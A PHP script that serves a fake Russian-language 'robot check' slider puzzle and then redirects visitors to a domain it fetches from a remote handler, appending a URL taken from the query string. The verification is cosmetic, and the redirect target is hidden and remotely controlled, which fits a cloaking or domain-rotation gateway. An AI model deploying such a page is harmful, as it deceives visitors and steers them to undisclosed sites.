<?php

session_start();

class Simple 
{

	CONST HTML_TITLE = 'Проверка на робота';

	protected $_uri = 'https://maxkv.pw/handler.active-domain.php';
	private $requiest_uri = null;
	private $activeDomain = null;
	private $_filename = 'domain_cache.txt';
	private $directUrl = false;
	private $redirectTo = null;

	public function setRequestUri($request)
	{
		$this->requiest_uri = $request;
		return $this;
	}

	public function execute()
	{
		if(isset($_GET['self_test']) && trim($_GET['self_test']) == 1)
		{
			$this->runSelfTest();
		}
		$this->activateRedirect();
		$this->setTemplate($errorMessage);
		
	}

	private function checkCaptcha($textCaptcha)
	{
		$textCaptcha = filter_var($textCaptcha, FILTER_SANITIZE_STRING);
		if(trim($textCaptcha) == '') return false;
    	if($textCaptcha != $_SESSION['captcha_text']) return false;
    	return true;
	}

	private function activateRedirect()
	{
		$this->getActiveDomain();
		if($this->activeDomain === null && $this->cachedDomain() === false) 
		{
			print(json_encode([
				'status'=>false,
				'message'=>'#ActiveDomainNotDefined'
			]));
			return;
		}
		$this->redirectTo = ($this->directUrl) ? 'https://' . $this->activeDomain  . $this->requiest_uri : 'https://' . $this->activeDomain  . $_GET['url'];
	}

	private function runSelfTest()
	{
		$isWritable = $isFetch = 'NO OK';
		if($this->getActiveDomain()) $isFetch = 'OK';
		$isWritable = @file_put_contents($this->_filename, "") !== false ? "OK" : "Not OK";
    	@unlink($this->_filename);
		echo 'File write: '.$isWritable.' и Domain fetch: '.$isFetch.'.';
		die();
	}

	private function redirect($domain)
	{
		header('Location: ' . $domain, true, 301);
		exit;
	}

	private function cachedDomain()
	{
		if ($this->activeDomain === null) {
	        if (file_exists($this->_filename)) {
	        	$this->activeDomain = trim(file_get_contents($this->_filename));
	            return true;
	        } else {
	            return false;
	        }
	    } elseif ($this->activeDomain) {
	        $success = file_put_contents($this->_filename, $this->activeDomain);
	        if ($success === false) {
	            return true;
	        }
	    }
	}

	private function getActiveDomain()
	{
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $this->_uri);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		$response = curl_exec($ch);
		if (curl_errno($ch)) {
	        $error_msg = curl_error($ch);
	        curl_close($ch);
	        return false;
	    }
		curl_close($ch);
		$response = json_decode($response);
		if(!isset($response->domain)) return false;
		return $this->prepareActiveDomain($response->domain);
	}

	private function prepareActiveDomain($url)
	{
		$parse = parse_url($url);
		$this->activeDomain = $parse['host'];
		$this->cachedDomain();
	}

	private function setTemplate($message)
	{
		$html = '
		<!DOCTYPE html>
		<html lang="en">
		<head>
		    <meta charset="UTF-8">
		    <meta name="viewport" content="width=device-width, initial-scale=1.0">
		    <title>Проверка на робота</title>
		    <style>
		        body, html {
		            margin: 0;
		            padding: 0;
		            font-family: Arial, sans-serif;
		        }

		        /* Стили для кнопки */
		        .check-btn {
		            padding: 10px 20px;
		            background-color: #28a745;
		            color: white;
		            border: none;
		            border-radius: 5px;
		            cursor: pointer;
		            font-size: 18px;
		            margin-top: 20px;
		        }

		        /* Стили для модального окна */
		        .modal {
		            display: none;
		            position: fixed;
		            z-index: 1000;
		            left: 0;
		            top: 0;
		            width: 100%;
		            height: 100%;
		            background-color: rgba(0, 0, 0, 0.7);
		            justify-content: center;
		            align-items: center;
		        }

		        .modal-content {
		            background-color: white;
		            padding: 20px;
		            border-radius: 10px;
		            position: relative;
		            text-align: center;
		            width: 500px;
		        }

		        /* Стили для ползунков и блоков */
		        .slider-container {
		            margin: 20px 0 0 0;
		            position: relative;
		            height: 200px;
		            background-repeat: no-repeat;
		            background-size: cover;
		            background-image: url("https://static.vecteezy.com/ti/vecteur-libre/p1/12484301-paysage-urbain-pixel-paysage-de-jeu-pixel-art-8-bits-vectoriel.jpg");
		        }

		        /* Лунка */
		        .hole {
		            position: absolute;
		            width: 50px;
		            height: 50px;
		            left: calc(85% - 50px);
		            user-select: none;
		            user-drag: none;
		            pointer-events: none;
		            opacity: 0.5;
		        }

		        /* Марионетка */
		        .block {
		            position: absolute;
		            width: 50px;
		            height: 50px;
		            cursor: pointer;
		            user-select: none;
		            user-drag: none;
		            pointer-events: none;
		            opacity: 0.8;
		        }

		        /* Ручка управления */
		        .handle {
		            position: absolute;
		            width: 80px;
		            height: 40px;
		            margin-bottom: 5px;
		            bottom: 0px;
		            left: 0%; /* Стартовая позиция ручки */
		            border-radius: 20px;
		            cursor: pointer;
		            background: #6590FE;
		            z-index: 1;
		            margin-left: 15px;
		            display: flex;
		            justify-content: center;
		            box-shadow: inset -2px -11px 21px -3px rgba(0,0,0,0.23);
		        }
		        .handle img {
		            user-select: none;
		            user-drag: none;
		            pointer-events: none;
		        }

		        .line {
		            position: absolute;
		            bottom: 21px;
		            width: calc(100% - 30px);
		            left: 15px;
		            height: 8px;
		            background: rgb(211 211 211);
		            z-index: 0;
		            border-radius: 50px;
		        }
		    </style>
		</head>
		<body>


		<div class="modal" id="modal" style="display: flex;">
		    <div class="modal-content">
		    	<p style="margin-bottom:0px;">Подтверди что ты не робот</p>
		        <h3 style="font-size: 30px; line-height: 1; padding: 0; margin: 0;">Сложи пазл для проверки!</h3>
		        <div class="slider-container">
		            <div class="hole">
		                <img src="assets/layer1.png" style="
		                        position: absolute;
		                        width: 100%;
		                        height: 100%;
		                    "/>
		            </div>
		            <div class="block puppet" id="slider1">
		                <img src="assets/svg2.png" style="
		                        position: absolute;
		                        width: 100%;
		                        height: 100%;
		                    "/>
		            </div>
		            <div class="handle" id="handle1">
		                <img src="assets/arrow-right.svg" alt="" style="width: 20px">
		            </div>
		            <div class="line"></div>
		        </div>
		        <p id="message"></p>
		    </div>
		</div>

		<script>
		    const topPadding = Math.random() * 120;

		    const checkBtn = document.getElementById(\'checkRobot\');
		    const modal = document.getElementById(\'modal\');
		    const slider1 = document.getElementById(\'slider1\');
		    const handle1 = document.getElementById(\'handle1\');
		    const message = document.getElementById(\'message\');
		    const hole = document.querySelector(\'.hole\');
		    const block = document.querySelector(\'.block\');

		    let completed = false;

		    hole.style.top = `${topPadding}px`;
		    block.style.top = `${topPadding}px`;

		    let isDragging = false;
		    let offset = 0;

		    // Открываем модалку
		    //checkBtn.addEventListener(\'click\', function() {
		    //    modal.style.display = \'flex\';
		    //    message.textContent = \'\';
		    //});

		    modal.style.display = \'flex\';
		    message.textContent = \'\';

		    // Функция для начала перетаскивания
		    function startDragging(e) {
		        isDragging = true;
		        const clientX = e.touches ? e.touches[0].clientX : e.clientX;
		        offset = clientX - handle1.offsetLeft;
		    }

		    // Функция для перетаскивания
		    function dragHandle(e) {
		        e.preventDefault();
		        if (isDragging && completed == false) {
		            const clientX = e.touches ? e.touches[0].clientX : e.clientX;
		            let newPosition = clientX - offset;
		            const containerWidth = document.querySelector(\'.slider-container\').offsetWidth;
		            const handleWidth = handle1.offsetWidth;

		            // Ограничение по горизонтальной оси
		            if (newPosition >= 0 && newPosition <= containerWidth - handleWidth) {
		                handle1.style.left = newPosition + \'px\'; // Двигаем ручку
		                slider1.style.left = newPosition + \'px\'; // Синхронно двигаем марионетку

		                // Проверка попадания марионетки в лунку
		                const holeLeft = hole.offsetLeft;
		                const blockLeft = slider1.offsetLeft;

		                // Если марионетка попадает в цель
		                if (Math.abs(blockLeft - holeLeft) < 10) {
		                    message.textContent = \'Вы прошли проверку!\';
		                    //setTimeout(() => modal.style.display = \'none\', 1000);
		                    completed = true;
		                   	setTimeout(() => location.href=\''.$this->redirectTo.'\', 1000);
		                }
		            }
		        }
		    }

		    // Завершение перетаскивания
		    function stopDragging() {
		        isDragging = false;
		    }

		    // Начало перетаскивания
		    handle1.addEventListener(\'mousedown\', startDragging);
		    handle1.addEventListener(\'touchstart\', startDragging);

		    // Перетаскивание ручки
		    document.addEventListener(\'mousemove\', dragHandle);
		    document.addEventListener(\'touchmove\', dragHandle);

		    // Завершение перетаскивания
		    document.addEventListener(\'mouseup\', stopDragging);
		    document.addEventListener(\'touchend\', stopDragging);
		</script>
		<!--LiveInternet counter--><a href="https://www.liveinternet.ru/click"
		target="_blank" style="display:none"><img id="licnt42DC" width="88" height="15" style="border:0" 
		title="LiveInternet: показано число посетителей за сегодня"
		src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7"
		alt=""/></a><script>(function(d,s){d.getElementById("licnt42DC").src=
		"https://counter.yadro.ru/hit?t26.6;r"+escape(d.referrer)+
		((typeof(s)=="undefined")?"":";s"+s.width+"*"+s.height+"*"+
		(s.colorDepth?s.colorDepth:s.pixelDepth))+";u"+escape(d.URL)+
		";h"+escape(d.title.substring(0,150))+";"+Math.random()})
		(document,screen)</script><!--/LiveInternet-->
		</body>
		</html>';
		print($html);
	}
}

(new Simple)->setRequestUri($_SERVER["REQUEST_URI"])->execute();